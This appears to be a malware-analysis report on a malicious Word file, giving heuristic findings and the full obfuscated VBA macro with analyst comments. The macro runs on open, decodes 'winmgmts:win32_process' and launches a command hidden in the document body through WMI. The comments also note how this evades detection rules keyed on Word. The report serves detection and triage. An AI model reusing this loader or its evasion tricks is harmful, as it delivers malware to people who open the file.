MALICIOUS
112
Risk Score
Heuristics 6
-
VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS: Document contains VBA macro code
-
CreateObject call (high) OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script:
Set Gzk2wkgbhs7 = CreateObject(Ny3ntbh8br75xmtk_4)
VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro (low) OLE_VBA_DOCOPEN: Document_Open macro. Matched line in script:
Private Sub Document_open()
Suspicious extracted artifact (info) EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard Office Open XML DrawingML namespace identifier, not a network indicator for this sample.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13374 bytes |

SHA-256: 677a0d005ae04c8307c7de65f2777948b2ff8aecc70418e3245d78851c56f294
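Detection
ClamAV: No threats found. A clean ClamAV result only means that no signature matched; it does not offset the heuristic findings above.
Obfuscation or payload: likely
113 of 186 identifiers look randomly generated (e.g. 'Gsbw9rhcxky572s2ev') — consistent with name-mangling obfuscation.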
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "Tmlal0ens8wu_k"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
' Analyst note: auto-exec entry point (the line flagged by OLE_VBA_DOCOPEN).
' Word runs this handler when the document is opened with macros enabled.
' Its only action is to call L3g0mx0zd96dnr, defined further down in this listing.
L3g0mx0zd96dnr
End Sub
Attribute VB_Name = "Jyg64cwez38qs"
Attribute VB_Name = "K7irhvyk1l2qvfj4"
Function L3g0mx0zd96dnr()
' Analyst note: main routine, called from Document_open. It
'   1. reads the document body text into V1,
'   2. builds an object name from string fragments padded with the junk token "sg yw ah",
'   3. strips the padding through Ov6308djv6_5w and passes the result to CreateObject,
'   4. calls .Create on that object with the de-padded document text as first argument.
' It takes no arguments and never assigns its own return value.
' Runtime errors are suppressed from here on, so any failing step stays silent.
On Error Resume Next
' V1 holds the document body. Tmlal0ens8wu_k is the ThisDocument module (see its
' VB_Name / VB_Base attributes at the top of the listing). The two outer operands
' are never assigned anywhere in this listing, so they presumably add nothing.
V1 = Gsbw9rhcxky572s2ev + Tmlal0ens8wu_k.Content + U3_sajjpz0xg
GoTo hwiKCGs
' Anti-analysis filler: the GoTo above jumps straight to the label of the same name,
' so the For Each loop below never runs. Its first condition compares a 3-character
' prefix with the 4-character literal "xxxx" and could never match anyway. The same
' template, with renamed identifiers, follows every meaningful statement in this module.
Dim aJFsjCH As Paragraph
Set udQexI = NSqinQRFB
For Each aJFsjCH In Tmlal0ens8wu_k.Paragraphs
Set ysnCAFkdE = yzenA
If Left(aJFsjCH.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
hwiKCGs = aJFsjCH.Range.ListFormat.ListString
ElseIf InStr(aJFsjCH.Range.Text, "kkiew") > 1 Then
DQOueLQ = aJFsjCH.Range.Text
DQOueLQ = Replace(saw, "sjgwb", "hqkwjbjdasd" & hwiKCGs)
aJFsjCH.Range.Text = DQOueLQ
Set aJFsjCH.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set pQZRBOM = TNpWFHGB
Next aJFsjCH
hwiKCGs:
' Fragment: "p" once the "sg yw ah" padding is removed.
U7 = "sg yw ahpsg yw ah"
' Fragment: "rocess" once the padding is removed.
S66copskgnknsnfo0v = "sg yw ahrosg yw ahsg yw ahcesg yw ahssg yw ahssg yw ahsg yw ah"
GoTo zkgKFWJA
' Filler, skipped by the GoTo above.
Dim HwnTBzhE As Paragraph
Set REJqVCBF = RYwhi
For Each HwnTBzhE In Tmlal0ens8wu_k.Paragraphs
Set Jnadq = HiuGR
If Left(HwnTBzhE.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
zkgKFWJA = HwnTBzhE.Range.ListFormat.ListString
ElseIf InStr(HwnTBzhE.Range.Text, "kkiew") > 1 Then
HJGmXJKi = HwnTBzhE.Range.Text
HJGmXJKi = Replace(saw, "sjgwb", "hqkwjbjdasd" & zkgKFWJA)
HwnTBzhE.Range.Text = HJGmXJKi
Set HwnTBzhE.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set GNJma = RIMsHDFCF
Next HwnTBzhE
zkgKFWJA:
' Fragment: ":win32_" once the padding is removed.
Te8wtcbyvvpoxmxd = "sg yw ah:wsg yw ahsg yw ahinsg yw ah3sg yw ah2sg yw ah_sg yw ah"
GoTo EuGvHJIFA
' Filler, skipped by the GoTo above.
Dim muNeZ As Paragraph
Set fkRNB = jEjDb
For Each muNeZ In Tmlal0ens8wu_k.Paragraphs
Set ETZnBE = AtFJIJRH
If Left(muNeZ.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
EuGvHJIFA = muNeZ.Range.ListFormat.ListString
ElseIf InStr(muNeZ.Range.Text, "kkiew") > 1 Then
wfkZc = muNeZ.Range.Text
wfkZc = Replace(saw, "sjgwb", "hqkwjbjdasd" & EuGvHJIFA)
muNeZ.Range.Text = wfkZc
Set muNeZ.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set UqpFTrw = xQzwHl
Next muNeZ
EuGvHJIFA:
' Fragment: "winmgmt" once the padding is removed.
Cqmvqwv2mhgj = "wsg yw ahinsg yw ahmsg yw ahgmsg yw ahtsg yw ahsg yw ah"
GoTo CfgeBBaeG
' Filler, skipped by the GoTo above.
Dim BESpqUGB As Paragraph
Set mkfqAz = DvSJBmm
For Each BESpqUGB In Tmlal0ens8wu_k.Paragraphs
Set odXVBPDIF = NKAdBk
If Left(BESpqUGB.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
CfgeBBaeG = BESpqUGB.Range.ListFormat.ListString
ElseIf InStr(BESpqUGB.Range.Text, "kkiew") > 1 Then
PqLZEEBcU = BESpqUGB.Range.Text
PqLZEEBcU = Replace(saw, "sjgwb", "hqkwjbjdasd" & CfgeBBaeG)
BESpqUGB.Range.Text = PqLZEEBcU
Set BESpqUGB.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set gAGhcQ = bLQawH
Next BESpqUGB
CfgeBBaeG:
' One character is taken from the host application's name instead of a literal:
' Mid(Application.Name, 6, 1). Assuming the host reports "Microsoft Word", that is "s".
' The arithmetic (3 + 3, 1 / 1) only hides the constants 6 and 1.
M8smj2v5dy0 = "sg yw ahsg yw ah" + Mid(Application.Name, 3 + 3, 1 / 1) + "sg yw ahsg yw ah"
GoTo RaxKCu
' Filler, skipped by the GoTo above.
Dim ISbAC As Paragraph
Set WAoynI = zWGQC
For Each ISbAC In Tmlal0ens8wu_k.Paragraphs
Set sOwvFZGAB = yCfiiI
If Left(ISbAC.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
RaxKCu = ISbAC.Range.ListFormat.ListString
ElseIf InStr(ISbAC.Range.Text, "kkiew") > 1 Then
CScvCwx = ISbAC.Range.Text
CScvCwx = Replace(saw, "sjgwb", "hqkwjbjdasd" & RaxKCu)
ISbAC.Range.Text = CScvCwx
Set ISbAC.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set ZJlJb = WTLimgC
Next ISbAC
RaxKCu:
' Fragments are joined in their final order; the result is still padded at this point.
A2e4ktou59ym67 = Cqmvqwv2mhgj + M8smj2v5dy0 + Te8wtcbyvvpoxmxd + U7 + S66copskgnknsnfo0v
GoTo dRABFBB
' Filler, skipped by the GoTo above.
Dim noIBAaC As Paragraph
Set kruzC = TUQrBlJ
For Each noIBAaC In Tmlal0ens8wu_k.Paragraphs
Set FgbwN = kVFKH
If Left(noIBAaC.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
dRABFBB = noIBAaC.Range.ListFormat.ListString
ElseIf InStr(noIBAaC.Range.Text, "kkiew") > 1 Then
gpiKAaAi = noIBAaC.Range.Text
gpiKAaAi = Replace(saw, "sjgwb", "hqkwjbjdasd" & dRABFBB)
noIBAaC.Range.Text = gpiKAaAi
Set noIBAaC.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set JfbchTi = VaarJII
Next noIBAaC
dRABFBB:
' Ov6308djv6_5w removes the "sg yw ah" padding. Analyst decode, under the
' Application.Name assumption above: "winmgmts:win32_process".
Ny3ntbh8br75xmtk_4 = Ov6308djv6_5w(A2e4ktou59ym67)
GoTo rMLXDHuiA
' Filler, skipped by the GoTo above.
Dim RaSTCBJP As Paragraph
Set aJnNECLFy = UrNjvhJ
For Each RaSTCBJP In Tmlal0ens8wu_k.Paragraphs
Set nBpcJQIFr = UnVIVP
If Left(RaSTCBJP.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
rMLXDHuiA = RaSTCBJP.Range.ListFormat.ListString
ElseIf InStr(RaSTCBJP.Range.Text, "kkiew") > 1 Then
BtKBDQAAH = RaSTCBJP.Range.Text
BtKBDQAAH = Replace(saw, "sjgwb", "hqkwjbjdasd" & rMLXDHuiA)
RaSTCBJP.Range.Text = BtKBDQAAH
Set RaSTCBJP.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set ZWCPB = iSVWDABGx
Next RaSTCBJP
rMLXDHuiA:
' Line flagged by OLE_VBA_CREATEOBJ. The object name exists only at run time, so a
' static string match on the decoded name will not hit this file; triage has to rely
' on decoding the fragments (as above) or on behavioural telemetry.
Set Gzk2wkgbhs7 = CreateObject(Ny3ntbh8br75xmtk_4)
GoTo qmcUJFIkH
' Filler, skipped by the GoTo above.
Dim pZRhAd As Paragraph
Set dsOgH = ghJbIGA
For Each pZRhAd In Tmlal0ens8wu_k.Paragraphs
Set xvdqU = LtrMAz
If Left(pZRhAd.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
qmcUJFIkH = pZRhAd.Range.ListFormat.ListString
ElseIf InStr(pZRhAd.Range.Text, "kkiew") > 1 Then
sCCwGluQV = pZRhAd.Range.Text
sCCwGluQV = Replace(saw, "sjgwb", "hqkwjbjdasd" & qmcUJFIkH)
pZRhAd.Range.Text = sCCwGluQV
Set pZRhAd.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set xckQJjGr = lnWpeBmI
Next pZRhAd
qmcUJFIkH:
' KK = document body text from character 4 onward, with the padding removed.
' The payload string therefore lives in the document body, not in the macro source;
' it is not shown anywhere in this report.
KK = Ov6308djv6_5w(Mid(V1, (4), Len(V1)))
' Presumably Win32_Process.Create, with KK as the command line; the other two
' arguments are never assigned in this listing. NOTE(review): a process started
' through WMI normally appears under the WMI provider host rather than as a child
' of the Office process, so parent/child rules keyed on Word may miss it. Confirm
' against sandbox or EDR telemetry for this sample.
Gzk2wkgbhs7.Create KK, K8ka8isk2neww2v, Lq8dbfky4j36sxr
GoTo fEIDYIi
' Filler, skipped by the GoTo above.
Dim NTBhU As Paragraph
Set xCruEHCw = NgUxCJEDv
For Each NTBhU In Tmlal0ens8wu_k.Paragraphs
Set NBVpnD = trvZFE
If Left(NTBhU.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
fEIDYIi = NTBhU.Range.ListFormat.ListString
ElseIf InStr(NTBhU.Range.Text, "kkiew") > 1 Then
EOtuGBnEz = NTBhU.Range.Text
EOtuGBnEz = Replace(saw, "sjgwb", "hqkwjbjdasd" & fEIDYIi)
NTBhU.Range.Text = EOtuGBnEz
Set NTBhU.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set dgzQUgD = DLxkDEEBm
Next NTBhU
fEIDYIi:
End Function
Function Ov6308djv6_5w(Lcy44518cplc4cdl)
' Analyst note: thin wrapper around Dn5xw1w7tvdndn1c. It copies its argument,
' passes the copy to Dn5xw1w7tvdndn1c and returns that result unchanged.
' The rest of the body is filler.
' Runtime errors are suppressed for the whole function.
On Error Resume Next
GoTo pZEXFDA
' Anti-analysis filler: the GoTo above jumps to the label of the same name, so the
' For Each loop below never runs. The same template repeats after every real statement.
Dim abZHkJZBK As Paragraph
Set YrQXFBD = cPcoEIP
For Each abZHkJZBK In Tmlal0ens8wu_k.Paragraphs
Set mQQtFWB = LzYPjECj
If Left(abZHkJZBK.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
pZEXFDA = abZHkJZBK.Range.ListFormat.ListString
ElseIf InStr(abZHkJZBK.Range.Text, "kkiew") > 1 Then
KEgih = abZHkJZBK.Range.Text
KEgih = Replace(saw, "sjgwb", "hqkwjbjdasd" & pZEXFDA)
abZHkJZBK.Range.Text = KEgih
Set abZHkJZBK.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set bMKKwJBJ = bHpJIdF
Next abZHkJZBK
pZEXFDA:
' Copy of the input argument; no transformation happens here.
W8j46swfqtk0f8 = Lcy44518cplc4cdl
GoTo gDjlOXAGL
' Filler, skipped by the GoTo above.
Dim VtqjnDAAM As Paragraph
Set zfIqJDAyQ = rHeRGcl
For Each VtqjnDAAM In Tmlal0ens8wu_k.Paragraphs
Set KuspFXDAI = RgTaF
If Left(VtqjnDAAM.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
gDjlOXAGL = VtqjnDAAM.Range.ListFormat.ListString
ElseIf InStr(VtqjnDAAM.Range.Text, "kkiew") > 1 Then
UMykQGB = VtqjnDAAM.Range.Text
UMykQGB = Replace(saw, "sjgwb", "hqkwjbjdasd" & gDjlOXAGL)
VtqjnDAAM.Range.Text = UMykQGB
Set VtqjnDAAM.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set kVBKFt = SoNHdIQGF
Next VtqjnDAAM
gDjlOXAGL:
' The actual de-padding is delegated to Dn5xw1w7tvdndn1c.
Gpa2l8f4ctfd = Dn5xw1w7tvdndn1c(W8j46swfqtk0f8)
GoTo VDHCrG
' Filler, skipped by the GoTo above.
Dim AWMwqBS As Paragraph
Set dgbwxFS = IecymB
For Each AWMwqBS In Tmlal0ens8wu_k.Paragraphs
Set HmtZDHAPD = bhPQFE
If Left(AWMwqBS.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
VDHCrG = AWMwqBS.Range.ListFormat.ListString
ElseIf InStr(AWMwqBS.Range.Text, "kkiew") > 1 Then
tcMeW = AWMwqBS.Range.Text
tcMeW = Replace(saw, "sjgwb", "hqkwjbjdasd" & VDHCrG)
AWMwqBS.Range.Text = tcMeW
Set AWMwqBS.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set QjNsmG = EyKmAhJch
Next AWMwqBS
VDHCrG:
' Return value: the string produced by Dn5xw1w7tvdndn1c.
Ov6308djv6_5w = Gpa2l8f4ctfd
GoTo ZPfdf
' Filler, skipped by the GoTo above.
Dim iFTXYv As Paragraph
Set qqRWy = qWiIGIGDJ
For Each iFTXYv In Tmlal0ens8wu_k.Paragraphs
Set RfMFdCA = sphJe
If Left(iFTXYv.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
ZPfdf = iFTXYv.Range.ListFormat.ListString
ElseIf InStr(iFTXYv.Range.Text, "kkiew") > 1 Then
UByyeFoDR = iFTXYv.Range.Text
UByyeFoDR = Replace(saw, "sjgwb", "hqkwjbjdasd" & ZPfdf)
iFTXYv.Range.Text = UByyeFoDR
Set iFTXYv.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set MDECCyAp = GqvyGaB
Next iFTXYv
ZPfdf:
End Function
Function Dn5xw1w7tvdndn1c(V0ni5l31tngqzygft)
' Analyst note: string de-obfuscator. The only effective statement is the Replace
' call near the middle of the body, which swaps every occurrence of the padding
' token "sg yw ah" in the argument for the value of Hw711_sg6h_xpvamq and returns
' the result. Everything else is filler.
GoTo zEIeyAFHA
' Anti-analysis filler: each GoTo jumps to the label of the same name, so none of the
' For Each loops in this function ever runs. Several filler blocks are chained
' back-to-back here with no real statement between them.
Dim nEjQW As Paragraph
Set cWESA = glTmjCF
For Each nEjQW In Tmlal0ens8wu_k.Paragraphs
Set XtpLXACJ = icbjIBkPN
If Left(nEjQW.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
zEIeyAFHA = nEjQW.Range.ListFormat.ListString
ElseIf InStr(nEjQW.Range.Text, "kkiew") > 1 Then
WQlDA = nEjQW.Range.Text
WQlDA = Replace(saw, "sjgwb", "hqkwjbjdasd" & zEIeyAFHA)
nEjQW.Range.Text = WQlDA
Set nEjQW.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set LzeAIr = yDNJHzE
Next nEjQW
zEIeyAFHA:
GoTo ZaqfIEn
' Filler, skipped by the GoTo above.
Dim oieHJ As Paragraph
Set pfFsgD = MyOTpvy
For Each oieHJ In Tmlal0ens8wu_k.Paragraphs
Set INUuF = qPMosxkC
If Left(oieHJ.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
ZaqfIEn = oieHJ.Range.ListFormat.ListString
ElseIf InStr(oieHJ.Range.Text, "kkiew") > 1 Then
dtfoAJA = oieHJ.Range.Text
dtfoAJA = Replace(saw, "sjgwb", "hqkwjbjdasd" & ZaqfIEn)
oieHJ.Range.Text = dtfoAJA
Set oieHJ.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set GAzFBIY = gLlPDxBAH
Next oieHJ
ZaqfIEn:
GoTo SNNwFD
' Filler, skipped by the GoTo above.
Dim dLQfA As Paragraph
Set OQpTCDE = uPQltOqx
For Each dLQfA In Tmlal0ens8wu_k.Paragraphs
Set eqnVhPDJA = xcstPND
If Left(dLQfA.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
SNNwFD = dLQfA.Range.ListFormat.ListString
ElseIf InStr(dLQfA.Range.Text, "kkiew") > 1 Then
pRcaEJIJe = dLQfA.Range.Text
pRcaEJIJe = Replace(saw, "sjgwb", "hqkwjbjdasd" & SNNwFD)
dLQfA.Range.Text = pRcaEJIJe
Set dLQfA.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set tJTsGC = pbleBAz
Next dLQfA
SNNwFD:
' The one real statement. Hw711_sg6h_xpvamq is never assigned in this listing, so the
' replacement is presumably an empty value and the padding token is simply deleted.
' The literal "sg yw ah" is constant across the module and makes a usable static
' pivot for this sample; it may differ in related documents.
Dn5xw1w7tvdndn1c = Replace(V0ni5l31tngqzygft, "sg yw ah", Hw711_sg6h_xpvamq)
GoTo jEkOBLAE
' Filler, skipped by the GoTo above.
Dim plGpJFAEA As Paragraph
Set SExKUUII = ZkmbzLECn
For Each plGpJFAEA In Tmlal0ens8wu_k.Paragraphs
Set fVuSP = sFWYrjIFK
If Left(plGpJFAEA.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
jEkOBLAE = plGpJFAEA.Range.ListFormat.ListString
ElseIf InStr(plGpJFAEA.Range.Text, "kkiew") > 1 Then
joMVJ = plGpJFAEA.Range.Text
joMVJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & jEkOBLAE)
plGpJFAEA.Range.Text = joMVJ
Set plGpJFAEA.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set UJduJGOD = RfMxHPIA
Next plGpJFAEA
jEkOBLAE:
GoTo zeuJUFK
' Filler, skipped by the GoTo above.
Dim aHEDDgEi As Paragraph
Set WoWJAgAwH = YSoqB
For Each aHEDDgEi In Tmlal0ens8wu_k.Paragraphs
Set XDTJcA = ZduQIJIBJ
If Left(aHEDDgEi.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
zeuJUFK = aHEDDgEi.Range.ListFormat.ListString
ElseIf InStr(aHEDDgEi.Range.Text, "kkiew") > 1 Then
hdKBL = aHEDDgEi.Range.Text
hdKBL = Replace(saw, "sjgwb", "hqkwjbjdasd" & zeuJUFK)
aHEDDgEi.Range.Text = hdKBL
Set aHEDDgEi.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set SvgorClJy = EkvUPdHq
Next aHEDDgEi
zeuJUFK:
GoTo jZuvLChdg
' Filler, skipped by the GoTo above.
Dim VsPUFmpJ As Paragraph
Set mwfUC = BmPRA
For Each VsPUFmpJ In Tmlal0ens8wu_k.Paragraphs
Set XlGjQ = WixdyrE
If Left(VsPUFmpJ.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
jZuvLChdg = VsPUFmpJ.Range.ListFormat.ListString
ElseIf InStr(VsPUFmpJ.Range.Text, "kkiew") > 1 Then
FzAaFN = VsPUFmpJ.Range.Text
FzAaFN = Replace(saw, "sjgwb", "hqkwjbjdasd" & jZuvLChdg)
VsPUFmpJ.Range.Text = FzAaFN
Set VsPUFmpJ.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set ywthAQL = tiPWn
Next VsPUFmpJ
jZuvLChdg:
End Function